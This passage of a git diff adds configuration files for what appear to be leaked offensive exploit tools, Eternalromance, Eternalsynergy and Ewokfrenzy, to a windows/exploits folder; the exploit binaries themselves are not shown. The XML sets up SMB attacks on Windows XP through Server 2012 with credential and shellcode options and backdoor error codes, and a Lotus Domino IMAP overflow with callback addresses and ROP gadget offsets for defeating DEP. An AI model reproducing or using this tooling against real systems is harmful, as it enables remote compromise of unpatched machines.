||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="VISTA_SP2" description="Windows Vista Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP0" description="Windows Server 2008 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP1" description="Windows Server 2008 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008_SP2" description="Windows Server 2008 Sp2, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="WIN7_SP0" description="Windows 7 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="WIN7_SP1" description="Windows 7 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008R2_SP0" description="Windows Server 2008 R2 Sp0, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name="SERVER_2008R2_SP1" description="Windows Server 2008 R2 Sp1, 32-bit/64-bit">
|
||||
<parameter name="OsMajor" hidden="true" type="U8" description="OS Major Version" >
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter name="OsMinor" hidden="true" type="U8" description="OS Minor Version" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
<parameter name="OsServicePack" hidden="true" type="U8" description="OS Service Pack Level" >
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</inputparameters>
|
||||
|
||||
<outputparameters>
|
||||
<parameter name="TargetOsArchitecture"
|
||||
description="The architecture of the target operating system"
|
||||
type="String"/>
|
||||
</outputparameters>
|
||||
|
||||
<errors>
|
||||
<errorcode name="ETRO_ERROR_NO_MEMORY" value="65" description="Out of memory"/>
|
||||
<errorcode name="ETRO_ERROR_INVALID_PIPE_CHOICE" value="66" description="Named pipe choice not supported"/>
|
||||
<errorcode name="ETRO_UNALIGNED_RPC_STRUCT" value="67" description="Unaligned data attempted to be sent over browser pipe"/>
|
||||
<errorcode name="ETRO_ERROR_PIPES_NOT_AVAILABLE" value="68" description="No pipes available to connect to"/>
|
||||
<errorcode name="ETRO_ERROR_WINSOCK_STARTUP" value="69" description="Winsock failed to start up"/>
|
||||
<errorcode name="ETRO_ERROR_PARAM_INIT" value="69" description="Error during parameter initialization"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_NOT_FOUND" value="70" description="Unable to find a Transaction struct with info leak"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_WRITE_OUT_OF_RANGE" value="71" description="Cannot write that far into Transaction, should have written more with WriteAndX"/>
|
||||
<errorcode name="ETRO_ERROR_TRANS_TAKEOVER_UNSUCCESSFUL" value="72" description="Memory written to was not a transaction we controlled"/>
|
||||
<errorcode name="ETRO_ERROR_OUT_OF_REMOTE_MEMORY" value="73" description="Out of memory to use in remote transaction"/>
|
||||
<errorcode name="ETRO_ERROR_UNKNOWN_TRANS_SIZE" value="74" description="Unknown transaction size detected"/>
|
||||
<errorcode name="ETRO_ERROR_NOT_ENOUGH_LEAK_DATA" value="75" description="Leak returned with less data than it should have"/>
|
||||
<errorcode name="ETRO_ERROR_STRUCT_WALK_ABORTED" value="76" description="Failed to walk structures and find Srv module"/>
|
||||
<errorcode name="ETRO_ERROR_BACKDOOR_NOT_PRESENT" value="77" description="Backdoor transaction sent but backdoor did not respond"/>
|
||||
<errorcode name="ETRO_ERROR_PAYLOAD_TOO_LARGE" value="78" description="Stage 1 payload exceeded max allowed size (0xFFFF)"/>
|
||||
<errorcode name="ETRO_ERROR_BACKDOOR_RETURNED_ERROR" value="79" description="Backdoor present but returned an error code"/>
|
||||
<errorcode name="ETRO_ERROR_BLUE_SCREENED_TARGET" value="80" description="Overwrite caused the target to blue screen"/>
|
||||
<errorcode name="ETRO_ERROR_OS_NOT_SUPPORTED" value="81" description="Offsets not available for the targeted OS"/>
|
||||
<errorcode name="ETRO_ERROR_DISPATCH_TABLE_NOT_FOUND" value="82" description="Unable to locate the dispatch table in memory"/>
|
||||
<errorcode name="ETRO_ERROR_EXPLOITATION_UNSUCCESSFUL" value="83" description="Exploit methods were tried and were not successful"/>
|
||||
<errorcode name="ETRO_ERROR_EXPLOIT_METHOD_UNSUCCESSFUL" value="84" description="Exploit method was not successful but did not crash, other methods may be tried"/>
|
||||
<errorcode name="ETRO_ERROR_INVALID_EXPLOIT_METHOD" value="85" description="Exploit method not possible for target OS"/>
|
||||
</errors>
|
||||
|
||||
<redirection>
|
||||
<local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="TargetIp"
|
||||
destport="TargetPort"
|
||||
closeoncompletion="true"/>
|
||||
</redirection>
|
||||
|
||||
<logic>
|
||||
<and>
|
||||
<service name="smb">
|
||||
<bindtovalue name="Protocol" value="SMB"/>
|
||||
<bindtopath name="TargetPort" path="//service[name='smb']/port"/>
|
||||
</service>
|
||||
<or>
|
||||
<os family="windows" name="Windows XP">
|
||||
<bindtovalue name="Target" value="XP"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP0"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="W2K3SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows XP" servicepack="1" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows XP" servicepack="2" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="1" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP1"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2003" servicepack="2" architecture="x64 64-bit">
|
||||
<bindtovalue name="Target" value="W2K3XPX64SP2"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows Vista" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="1" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008" servicepack="2" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 2008 R2" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
<os family="windows" name="Windows 7" servicepack="0" architecture="x86 32-bit">
|
||||
<bindtovalue name="Target" value="WVISTA_2008_7"/>
|
||||
</os>
|
||||
</or>
|
||||
</and>
|
||||
</logic>
|
||||
|
||||
</config>
|
||||
BIN
windows/exploits/Eternalromance-1.4.0.exe
Normal file
BIN
windows/exploits/Eternalromance-1.4.0.exe
Normal file
Binary file not shown.
21
windows/exploits/Eternalromance-1.4.0.fb
Normal file
21
windows/exploits/Eternalromance-1.4.0.fb
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="df1cc1973caa2c3e1bbe4d2e48ffd23e50e4e428"
|
||||
name="Eternalromance"
|
||||
version="1.4.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:touchlist>
|
||||
<t:plugin name="Smbtouch"
|
||||
displayname="ETRO Vulnerability Touch"
|
||||
description="Check if Target is vulnerable to ETRO">
|
||||
<t:oparam name="Target" value="Target"/>
|
||||
<t:oparam name="TargetOsArchitecture" value="TargetOsArchitecture"/>
|
||||
<t:oparam name="PipeName" value="PipeName"/>
|
||||
<t:oparam name="ShareName" value="ShareName"/>
|
||||
<t:oparam name="Credentials" value="Credentials"/>
|
||||
<t:oparam name="Username" value="Username"/>
|
||||
<t:oparam name="Password" value="Password"/>
|
||||
<t:oparam name="NtlmHash" value="NtlmHash"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
185
windows/exploits/Eternalsynergy-1.0.1.0.xml
Normal file
185
windows/exploits/Eternalsynergy-1.0.1.0.xml
Normal file
|
|
@ -0,0 +1,185 @@
|
|||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<config xmlns='urn:trch' name='Eternalsynergy' version='1.0.1' schemaversion='2.1.0' configversion='1.0.1.0' id='665a77d7870f1e8dc34048203dc820525c09bd23'>
|
||||
<inputparameters>
|
||||
<parameter type='S16' name='NetworkTimeout' description='Timeout for blocking network calls (in seconds). Use -1 for no timeout.'>
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
<parameter type='IPv4' name='TargetIp' description='Target IP Address'/>
|
||||
<parameter type='TcpPort' name='TargetPort' description='Target TCP port'>
|
||||
<default>445</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MaxLeakAttempts' description='Number of tries to exploit. Default 7'>
|
||||
<default>7</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MaxExploitAttempts' description='Number of tries to exploit. Default 3'>
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter type='U32' name='AttemptIndex' description='How many times ETSY has already been used against this target (0-7)'>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter type='Boolean' name='ManyCoreTarget' description='Boolean specifying if the target is assumed to have many (8 or more) cores, physical or virtual'>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter type='String' name='PipeName' description='The named pipe to use'>
|
||||
</parameter>
|
||||
<paramchoice name='ExploitMethod' description='Which exploit method to use'>
|
||||
<default>Default</default>
|
||||
<paramgroup name='Default' description='Use the best exploit method(s) for the target OS'>
|
||||
<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Matched-pairs' description='More reliable'>
|
||||
<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Classic-Synergy' description='Less reliable'>
|
||||
<parameter hidden='true' type='U32' name='ExploitMethodChoice' description=''>
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<parameter xdevmap='EXPLOIT_SHELLCODE' type='LocalFile' name='ShellcodeFile' description='DOPU (x64 version!) ONLY! Other shellcode will likely BSOD.'/>
|
||||
<paramchoice name='Credentials' description='Type of credentials to use'>
|
||||
<default>Anonymous</default>
|
||||
<paramgroup name='Anonymous' description='Anonymous (NULL session)'>
|
||||
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='Buffer' name='Username' description=''>
|
||||
<default/>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='Buffer' name='Password' description=''>
|
||||
<default/>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Guest' description='Guest account'>
|
||||
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='Buffer' name='Username' description=''>
|
||||
<default>Guest</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='Buffer' name='Password' description=''>
|
||||
<default/>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Blank' description='User account with no password set'>
|
||||
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
|
||||
<parameter hidden='true' type='Buffer' name='Password' description=''>
|
||||
<default/>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='Password' description='User name and password'>
|
||||
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
|
||||
<parameter type='Buffer' name='Password' description='Password entered as hex bytes (in unicode)'/>
|
||||
</paramgroup>
|
||||
<paramgroup name='NTLM' description='User name and NT and/or LM hash'>
|
||||
<parameter hidden='true' type='U32' name='CredChoice' description=''>
|
||||
<default>4</default>
|
||||
</parameter>
|
||||
<parameter type='Buffer' name='Username' description='Username entered as hex bytes (in unicode)'/>
|
||||
<parameter type='Buffer' name='ntHash' description='NT password hash (in hex), or blank to use LM hash'>
|
||||
<default/>
|
||||
</parameter>
|
||||
<parameter type='Buffer' name='lmHash' description='LM password hash (in hex), or blank to use NT hash'>
|
||||
<default/>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<paramchoice name='Protocol' description='SMB (default port 445) or NBT (default port 139)'>
|
||||
<default>SMB</default>
|
||||
<paramgroup name='SMB' description=''>
|
||||
<parameter hidden='true' type='Boolean' name='UsingNbt' description='Boolean stating to use Nbt or not'>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='NBT' description=''>
|
||||
<parameter hidden='true' type='Boolean' name='UsingNbt' description='Boolean stating to use Nbt or not'>
|
||||
<default>1</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<paramchoice name='Target' description='Operating System, Service Pack, of target OS'>
|
||||
<paramgroup name='WIN8_SP0' description='Windows 8 Sp0, 64-bit'>
|
||||
<parameter hidden='true' type='U8' name='OsMajor' description='OS Major Version'>
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U8' name='OsMinor' description='OS Minor Version'>
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U8' name='OsServicePack' description='OS Service Pack Level'>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='SERVER_2K12_SP0' description='Windows Server 2012 Sp0, 64-bit'>
|
||||
<parameter hidden='true' type='U8' name='OsMajor' description='OS Major Version'>
|
||||
<default>6</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U8' name='OsMinor' description='OS Minor Version'>
|
||||
<default>2</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U8' name='OsServicePack' description='OS Service Pack Level'>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
</inputparameters>
|
||||
<outputparameters>
|
||||
<parameter type='Buffer' name='TargetOsArchitecture' description='The architecture of the target operating system'/>
|
||||
</outputparameters>
|
||||
<errors>
|
||||
<errorcode name='ETSY_ERROR_NO_MEMORY' value='65' description='Out of memory'/>
|
||||
<errorcode name='ETSY_ERROR_INVALID_PIPE_CHOICE' value='66' description='Named pipe choice not supported'/>
|
||||
<errorcode name='ETSY_UNALIGNED_RPC_STRUCT' value='67' description='Unaligned data attempted to be sent over browser pipe'/>
|
||||
<errorcode name='ETSY_ERROR_PIPES_NOT_AVAILABLE' value='68' description='No pipes available to connect to'/>
|
||||
<errorcode name='ETSY_ERROR_WINSOCK_STARTUP' value='69' description='Winsock failed to start up'/>
|
||||
<errorcode name='ETSY_ERROR_PARAM_INIT' value='69' description='Error during parameter initialization'/>
|
||||
<errorcode name='ETSY_ERROR_TRANS_NOT_FOUND' value='70' description='Unable to find a Transaction struct with info leak'/>
|
||||
<errorcode name='ETSY_ERROR_TRANS_WRITE_OUT_OF_RANGE' value='71' description='Cannot write that far into Transaction, should have written more with WriteAndX'/>
|
||||
<errorcode name='ETSY_ERROR_TRANS_TAKEOVER_UNSUCCESSFUL' value='72' description='Memory written to was not a transaction we controlled'/>
|
||||
<errorcode name='ETSY_ERROR_OUT_OF_REMOTE_MEMORY' value='73' description='Out of memory to use in remote transaction'/>
|
||||
<errorcode name='ETSY_ERROR_UNKNOWN_TRANS_SIZE' value='74' description='Unknown transaction size detected'/>
|
||||
<errorcode name='ETSY_ERROR_NOT_ENOUGH_LEAK_DATA' value='75' description='Leak returned with less data than it should have'/>
|
||||
<errorcode name='ETSY_ERROR_STRUCT_WALK_ABORTED' value='76' description='Failed to walk structures and find Srv module'/>
|
||||
<errorcode name='ETSY_ERROR_BACKDOOR_NOT_PRESENT' value='77' description='Backdoor transaction sent but backdoor did not respond'/>
|
||||
<errorcode name='ETSY_ERROR_PAYLOAD_TOO_LARGE' value='78' description='Stage 1 payload exceeded max allowed size (0xFFFF)'/>
|
||||
<errorcode name='ETSY_ERROR_BACKDOOR_RETURNED_ERROR' value='79' description='Backdoor present but returned an error code'/>
|
||||
<errorcode name='ETSY_ERROR_BLUE_SCREENED_TARGET' value='80' description='Overwrite caused the target to blue screen'/>
|
||||
<errorcode name='ETSY_ERROR_OS_NOT_SUPPORTED' value='81' description='Offsets not available for the targeted OS'/>
|
||||
<errorcode name='ETSY_ERROR_DISPATCH_TABLE_NOT_FOUND' value='82' description='Unable to locate the dispatch table in memory'/>
|
||||
<errorcode name='ETSY_ERROR_EXPLOITATION_UNSUCCESSFUL' value='83' description='Exploit methods were tried and were not successful'/>
|
||||
<errorcode name='ETSY_ERROR_EXPLOIT_METHOD_UNSUCCESSFUL' value='84' description='Exploit method was not successful but did not crash, other methods may be tried'/>
|
||||
<errorcode name='ETSY_ERROR_INVALID_EXPLOIT_METHOD' value='85' description='Exploit method not possible for target OS'/>
|
||||
<errorcode name='ETSY_ERROR_TIPPYBEER' value='86' description='Tippybeer encountered an unrecoverable error, probably memory related'/>
|
||||
<errorcode name='ETSY_ERROR_CONNECTION_LOCAL' value='87' description='Something went wrong at the network layer on our end!'/>
|
||||
<errorcode name='ETSY_ERROR_CONNECTION_REMOTE' value='88' description='Connection to target failed'/>
|
||||
<errorcode name='ETSY_ERROR_ARCH' value='89' description='Architecture is unknown or not supported'/>
|
||||
</errors>
|
||||
<redirection>
|
||||
<local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='true' destaddr='TargetIp' destport='TargetPort'/>
|
||||
</redirection>
|
||||
<logic>
|
||||
<and>
|
||||
<service name='smb'>
|
||||
<bindtovalue name='Protocol' value='SMB'/>
|
||||
<bindtopath path="//service[name='smb']/port" name='TargetPort'/>
|
||||
</service>
|
||||
<or>
|
||||
<os servicepack='0' name='Windows 8' family='windows' architecture='x64 64-bit'>
|
||||
<bindtovalue name='Target' value='WIN8_SP0'/>
|
||||
</os>
|
||||
<os servicepack='0' name='Windows Server 2012' family='windows' architecture='x64 64-bit'>
|
||||
<bindtovalue name='Target' value='SERVER_2K12_SP0'/>
|
||||
</os>
|
||||
</or>
|
||||
</and>
|
||||
</logic>
|
||||
</config>
|
||||
BIN
windows/exploits/Eternalsynergy-1.0.1.exe
Normal file
BIN
windows/exploits/Eternalsynergy-1.0.1.exe
Normal file
Binary file not shown.
21
windows/exploits/Eternalsynergy-1.0.1.fb
Normal file
21
windows/exploits/Eternalsynergy-1.0.1.fb
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="665a77d7870f1e8dc34048203dc820525c09bd23"
|
||||
name="Eternalsynergy"
|
||||
version="1.0.1"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:touchlist>
|
||||
<t:plugin name="Smbtouch"
|
||||
displayname="ETSY Vulnerability Touch"
|
||||
description="Check if Target is vulnerable to ETSY">
|
||||
<t:oparam name="Target" value="Target"/>
|
||||
<t:oparam name="TargetOsArchitecture" value="TargetOsArchitecture"/>
|
||||
<t:oparam name="PipeName" value="PipeName"/>
|
||||
<t:oparam name="ShareName" value="ShareName"/>
|
||||
<t:oparam name="Credentials" value="Credentials"/>
|
||||
<t:oparam name="Username" value="Username"/>
|
||||
<t:oparam name="Password" value="Password"/>
|
||||
<t:oparam name="NtlmHash" value="NtlmHash"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
</t:config>
|
||||
8
windows/exploits/Ewokfrenzy-2.0.0.0.fb
Normal file
8
windows/exploits/Ewokfrenzy-2.0.0.0.fb
Normal file
|
|
@ -0,0 +1,8 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="c6cbf455066b1dbf43c7c3332a50a273e986ec5c"
|
||||
name="Ewokfrenzy"
|
||||
version="2.0.0"
|
||||
configversion="2.0.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
</t:config>
|
||||
105
windows/exploits/Ewokfrenzy-2.0.0.0.xml
Normal file
105
windows/exploits/Ewokfrenzy-2.0.0.0.xml
Normal file
|
|
@ -0,0 +1,105 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="c6cbf455066b1dbf43c7c3332a50a273e986ec5c"
|
||||
name="Ewokfrenzy"
|
||||
version="2.0.0"
|
||||
configversion="2.0.0.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
<t:inputparameters>
|
||||
|
||||
<!-- Parameters for the target machine -->
|
||||
<t:parameter name="TargetIp" type="IPv4" description="Target IPv4 Address (dot notation)" />
|
||||
<t:parameter name="TargetPort" type="TcpPort" description="Target Port Number for IMAP service" />
|
||||
|
||||
<!-- Parameters for the callback machine -->
|
||||
<t:parameter name="CallbackIp" type="IPv4" description="Callback IPv4 Address (dot notation)" />
|
||||
<t:parameter name="CallbackPort" type="TcpPort" description="Callback Port Number" default="0" />
|
||||
<t:parameter name="CallbackLocalPort" type="TcpPort" description="Callback Port Number" required="false" />
|
||||
<t:parameter name="NetworkTimeout" type="S16" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." default="60" />
|
||||
|
||||
<t:paramchoice name="DominoVersion" description="The version of Lotus Domino running on the target">
|
||||
|
||||
<!-- This is a template for the version-dependent input parameters
|
||||
<t:paramgroup name="7.0.2" description="">
|
||||
<t:parameter name="ReturnAddrOffset" description="Number of bytes between the start of the input buffer and the vulnerable return address" type="U32" value="0x22C" hidden="true" />
|
||||
<t:parameter name="AddrPopEax" description="Memory address satisfying the requirements for the PopEax routine" type="U32" value="0x0042A001" hidden="true" />
|
||||
<t:parameter name="AddrVirtualAlloc" description="Memory address whose contents point to the kernel32.VirtualAlloc routine" type="U32" value="0x0043305C" hidden="true" />
|
||||
<t:parameter name="AddrJmpEaxPtr" description="Memory address satisfying the requirements for the JmpEaxPtr routine" type="U32" value="0x0041D5A7" hidden="true" />
|
||||
<t:parameter name="AddrPopEdi" description="Memory address satisfying the requirements for the PopEdi routine" type="U32" value="0x0042CB58" hidden="true" />
|
||||
<t:parameter name="AddrEaxToEsi" description="Memory address satisfying the requirements for the EaxToEsi routine" type="U32" value="0x100AAADD" hidden="true" />
|
||||
<t:parameter name="AddrCopyCode" description="Memory address satisfying the requirements for the CopyCode routine" type="U32" value="0x60709A24" hidden="true" />
|
||||
<t:parameter name="AddrIncEax" description="Memory address satisfying the requirements for the IncEax routine" type="U32" value="0x600F8E54" hidden="true" />
|
||||
<t:parameter name="AddrJmpEax" description="Memory address satisfying the requirements for the JmpEax routine" type="U32" value="0x00429A6C" hidden="true" />
|
||||
|
||||
<t:parameter name="AddrSetAtEdxRet" description="Memory address satisfying the requirements for the SetAtEdxRet routine" type="U32" value="0x004050A7" hidden="true" />
|
||||
<t:parameter name="AddrClrEaxRet" description="Memory address satisfying the requirements for the ClrEaxRet routine" type="U32" value="0x6001FAC1" hidden="true" />
|
||||
<t:parameter name="RetEip" description="Address of instruction to cleanly return execution to" type="U32" value="0x00413E78" hidden="true" />
|
||||
</t:paramgroup>
|
||||
-->
|
||||
|
||||
<t:paramgroup name="6.5.4" description="">
|
||||
<!-- Return Addresses appearing in null-friendly buffer in conventional DEP defeat -->
|
||||
<t:parameter name="AddrPopEax" description="" type="U32" value="0x00428463" hidden="true" />
|
||||
<t:parameter name="AddrVirtualAlloc" description="" type="U32" value="0x0042E038" hidden="true" />
|
||||
<t:parameter name="AddrJmpEaxPtr" description="" type="U32" value="0x00420CF5" hidden="true" />
|
||||
<t:parameter name="AddrPopEdi" description="" type="U32" value="0x60132252" hidden="true" />
|
||||
<t:parameter name="AddrEaxToEsi" description="" type="U32" value="0x60951039" hidden="true" />
|
||||
<t:parameter name="AddrCopyCode" description="" type="U32" value="0x607112B4" hidden="true" />
|
||||
<t:parameter name="AddrIncEax" description="" type="U32" value="0x60168187" hidden="true" />
|
||||
<t:parameter name="AddrJmpEax" description="" type="U32" value="0x600A371D" hidden="true" />
|
||||
|
||||
<!-- Return Addresses appearing in null-friendly buffer after conventional DEP defeat -->
|
||||
<t:parameter name="AddrSetAtEdxRet" description="" type="U32" value="0x609DBEA1" hidden="true" />
|
||||
<t:parameter name="AddrClrEaxRet" description="" type="U32" value="0x0042845E" hidden="true" />
|
||||
|
||||
<t:parameter name="OffsetEsp2Buffer" description="" type="U32" value="0x000000BC" hidden="true" />
|
||||
<t:parameter name="OffsetEsp2Ebp" description="" type="U32" value="0x00000090" hidden="true" />
|
||||
<t:parameter name="CleanupOverflowed" description="" type="U32" value="0x60A528EC" hidden="true" />
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="7.0.2" description="">
|
||||
<!-- Return Addresses appearing in null-friendly buffer in conventional DEP defeat -->
|
||||
<t:parameter name="AddrPopEax" description="" type="U32" value="0x0042A001" hidden="true" />
|
||||
<t:parameter name="AddrVirtualAlloc" description="" type="U32" value="0x0043305C" hidden="true" />
|
||||
<t:parameter name="AddrJmpEaxPtr" description="" type="U32" value="0x0041D5A7" hidden="true" />
|
||||
<t:parameter name="AddrPopEdi" description="" type="U32" value="0x0042CB58" hidden="true" />
|
||||
<t:parameter name="AddrEaxToEsi" description="" type="U32" value="0x100AAADD" hidden="true" />
|
||||
<t:parameter name="AddrCopyCode" description="" type="U32" value="0x60709A24" hidden="true" />
|
||||
